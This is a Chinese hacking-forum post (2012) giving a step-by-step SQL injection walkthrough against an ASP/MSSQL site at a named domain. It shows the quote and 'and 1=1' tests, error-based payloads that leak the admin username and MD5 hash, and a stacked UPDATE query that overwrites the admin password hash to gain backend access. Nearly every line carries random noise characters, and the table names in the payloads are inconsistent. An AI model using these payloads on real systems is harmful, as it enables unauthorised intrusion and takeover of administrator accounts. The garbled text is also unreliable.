经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。! z6 Y% ^* b. t$ H6 M; \7 s5 O5 m
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)1 O% q5 t* n' K( {) v
测试如下:7 L6 J, m2 V) v& T) Q! Y. ~
http://www.tmdsb.com/news.asp?id=121
/ u; R. B, ~ x% }$ n Y在地址后输入单引号,显示
# E2 Y/ l# d6 G* v: wMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’6 \4 H- E5 a# {4 G3 W5 J6 Z( ?
字符串 ’’’ 之前有未闭合的引号
+ x: `& \1 y- D, B) D/news/tmdws.asp,行636 f% r" ~/ J7 m9 `8 \1 v
说明没有过滤单引号且数据库是MSSQL.; ~" h* i% A" Y) C
and 1=1正常。and 1=2出错。肯定存在注入. R1 Y) r! C4 Z. m; R- T% P G! V" u$ E
接着输入
* d+ ]( E! b- g; F1 A" F/ h2 K) chttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
5 r& R# I8 C# b- D# w) A得到帐号为:admin
8 U, y: m3 o" w' H6 M. R! yhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)2 p! E, ]3 I: |- ] w& _
得到密码为:a4716077c2ba075c
% u6 ?) i l; C [/ g2 p接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
) V! E. G! A# R命令如下 :
1 y( d+ j$ M* W& F1 e# W7 y( v: b;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
$ q7 B# o# s" }5 y; k. s3 t3 ]& T这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41